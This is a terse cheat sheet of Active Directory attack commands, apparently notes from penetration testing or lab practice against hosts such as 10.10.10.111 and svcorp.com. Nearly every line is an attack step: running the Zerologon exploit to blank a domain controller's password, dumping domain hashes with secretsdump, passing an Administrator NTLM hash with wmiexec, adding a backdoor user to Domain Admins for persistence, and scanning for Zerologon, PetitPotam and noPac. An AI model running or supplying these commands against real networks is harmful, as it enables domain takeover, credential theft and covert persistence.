git clone ==> https://github.com/risksense/zerologon
python3 set_empty_pw.py sv-dc01 10.10.10.111v
impacket-secretsdump -just-dc -no-pass SV-DC01\$@10.10.10.111
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:63485d30576a1a741106e3e800053b34 svcorp.com/Administrator@10.11.1.20
#Persistencia
net user macaco Tomas123 /add /domain
net group "Domain Admins" macaco /add /domain
crackmapexec smb <ip> -u '' -p '' -M zerologo
crackmapexec smb <ip> -u '' -p '' -M petitpotam
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac
git clone https://github.com/samratashok/ADModule
PS C:\Users\Public> Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose
https://github.com/leechristensen/SpoolSample